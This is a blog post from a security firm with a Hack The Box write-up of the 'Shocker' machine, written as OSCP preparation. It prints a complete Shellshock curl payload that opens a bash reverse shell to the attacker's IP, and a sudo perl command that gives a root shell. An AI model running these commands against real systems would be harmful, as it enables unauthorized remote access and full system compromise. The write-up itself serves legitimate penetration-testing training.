Road to OSCP - Hack The Box Write Up - Shocker

Blog

11
- Jan
2020
Posted by: Ángel Guzmán
[Cybersecurity & hacking tools and techniques]
Road to OSCP - Hack The Box Write Up - Shocker

Hack the Box is an online platform to test and advance your skills in penetration testing and cyber security.

In this series of articles we will show how junior evaluators complete some Hack The Box machines in their road to OSCP, a well-known, respected, and required for many top cybersecurity positions certification. Certified OSCPs are able to identify existing vulnerabilities and execute organized attacks in a controlled and focused manner. They can leverage or modify existing exploit code to their advantage, perform network pivoting and data exfiltration, and compromise systems due to poor configurations.

Let's start with the fun!

Shocker

Initial Foothold

Let's use gobuster on port 80. We find a directory that returns a 403 (forbidden): cgi-bin.

Since the box is called Shocker, I expect some kind of shellshock vulnerability. For that, let's see if we can find a bash script inside the folder we just found.

gobuster dir -w /home/angel/ctf/wordlists/web/raft-medium-directories.txt -u http://10.10.10.56/cgi-bin/ -x sh

We find: 10.10.10.56/cgi-bin/user.sh

User

After searching for a while about shellshock + cgi-bin I came up with this: curl -s -A '() { :; }; echo "Content-Type: text/plain"; echo; /bin/bash -c "bash -i >& /dev/tcp/10.10.14.22/12345 0>&1"' http://10.10.10.56/cgi-bin/user.sh

Which gives us a reverse shell. We can get the user flag at: /home/shelly/user.txt.

Root

Doing sudo -l reveals we can use perl as root without a password.

Quick search on GTFObins and we get this: sudo /usr/bin/perl -e 'exec "/bin/sh";' which gives us a root shell.

tags
Ángel Guzmán/Junior evaluator

Degree and Master in telecommunications by the University of Granada, specialized in telematics. Joined jtsec in November of 2019 as a Junior cybersecurity evaluator.

Since he joined jtsec, he has participated in several internal hardware hacking projects, while also receiving training about the LINCE certification.

His main motivation is to learn, from small tools for his daily work to new technologies.


Contact

Send us your questions or suggestions!

By sending your data you allow us to use it to resolve your doubts by sending you commercial information of interest. We will delete it when they are no longer necessary for this matter. Know your rights in our Privacy Policy.
RECENT POSTS
jtsec achieves pioneering accreditation for MEMeC cryptologic evaluation
Jan 17, 2025
jtsec achieves pioneering accreditation for MEMeC cryptologic evaluation
jtsec & Applus+ Laboratories at ICCC24
Nov 14, 2024
jtsec & Applus+ Laboratories at ICCC24
How to use the CCN product catalog to improve your company's security
Oct 14, 2024
How to use the CCN product catalog to improve your company's security
Common Criteria Statistics 2023
June 17, 2024
Common Criteria Statistics 2023
How to enter ENS category high, stay in the catalog and add new versions of my product
April 23, 2024
How to enter ENS category high, stay in the catalog and add new versions of my product
jtsec - Our LINCE 2023
Febr 6, 2024
jtsec - Our LINCE 2023
We wish you a happy and cybersecure 2024
Dec 19, 2023
We wish you a happy and cybersecure 2024
How to Prepare Your Products and Services for the Quantum Era and Ensure Their Certification?
Dec 14, 2023
How to Prepare Your Products and Services for the Quantum Era and Ensure Their Certification?
How to include your product or service in ENS ALTA.
Oct 31, 2023
How to include your product or service in ENS ALTA.
Certifications and cybersecurity methodologies are generating interest among companies and organizations at both the national and international levels.
Sept 19, 2023
Certifications and cybersecurity methodologies are generating interest among companies and organizations at both the national and international levels.
CATEGORIES